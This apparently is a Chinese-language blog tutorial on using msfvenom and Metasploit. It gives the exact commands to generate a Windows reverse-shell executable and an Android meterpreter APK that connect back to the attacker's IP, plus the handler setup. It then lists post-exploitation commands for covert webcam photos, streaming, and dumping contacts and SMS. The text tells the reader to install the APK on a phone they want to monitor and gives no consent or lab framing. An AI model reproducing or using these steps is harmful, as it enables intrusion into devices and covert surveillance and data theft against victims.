簡介
msfvenom
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用來生成后門的軟件

查看所有--payload的模塊
msfvenom -l payloads

文件后綴名-f的格式
msfvenom --help-formats

metasploit
Metasploit Framework(MSF)是一款開源安全漏洞檢測工具,附帶數千個已知的軟件漏洞,並保持持續更新。Metasploit可以用來信息收集、漏洞探測、漏洞利用等滲透測試的全流程,被安全社區冠以“可以黑掉整個宇宙”之名。剛開始的Metasploit是采用Perl語言編寫的,但是再后來的新版中,改成了用Ruby語言編寫的了。在kali中,自帶了Metasploit工具。
生成的木馬是前端的話,那么這個就是后端
msfvenom的shell在windows中的使用
msfvenom生成shell.exe
msfvenom -p windows/meterpreter/reverse_tcp lhost=222.222.221.140 lport=1211 -f exe > /root/shell.exe
啟動metasploit
輸入命令:
msfconsole
metasploit偵聽
msf > use exploit/multi/handler #加載模塊 msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp #設置payload payload => windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost kali的ip #設置kali的ip lhost => 192.168.152.131 msf exploit(multi/handler) > set lport 1211 #設置kali的端口 lport => 1211 msf exploit(multi/handler) > exploit #執行 [*] Started reverse TCP handler on 222.222.221.140:1211
將生成的shell上傳至windows主機中並運行
提示有返回即可控制對方電腦,如同操作linux服務器一樣

使用
? - 幫助菜單
download -下載文件/文件夾



msfvenom的apk在android中的使用
msfvenom生成shell.apk
ifconfig查看kali的ip,ip為222.222.221.140

輸入命令:
msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apk.apk
這里的5555是設置的端口,也可以自己更改,顯示這個說明已經生成成功 只有9K多大小

啟動metasploit
輸入命令:
msfconsole
啟動msfconsole

metasploit配置及監聽
在控制台中輸入
use exploit/multi/handler //加載模塊
set payload android/meterpreter/reverse_tcp //選擇Payload
show options //查看參數設置

這里需要設置LHOST的ip地址,也就是你的kali的ip地址
還有LPORT端口,剛才設置的為5555,也需要更改一下(剛才直接設置為4444也是可以的)
set LHOST 192.168.1.114 //這里的地址設置成我們剛才生成木馬的IP地址(kali的ip)
set LPORT 5555 //這里的端口設置成剛才我們生成木馬所監聽的端口
exploit //開始執行漏洞 開始監聽,等待手機上線
接下來就要把生成的apk裝在你想監控的手機上了,等待手機上線了

使用
然后可以輸入sysinfo 查看手機信息

webcam_list 查看手機有多少個攝像頭 這里顯示是2個

webcam_stream //開啟攝像頭

webcam_snap //隱秘拍照功能


dump_contacts //導出電話號碼

dump_sms //導出信息

導出的文件拍的照片都會在root下面

可以輸入?查看更多命令

session切換
background #后台運行當前session sessions #列出所有session sessions -i Id #選擇某一個sessionID進入session sessions -n Name -i Id #給session重命名

參考:https://blog.csdn.net/langtuteng17/article/details/80444115
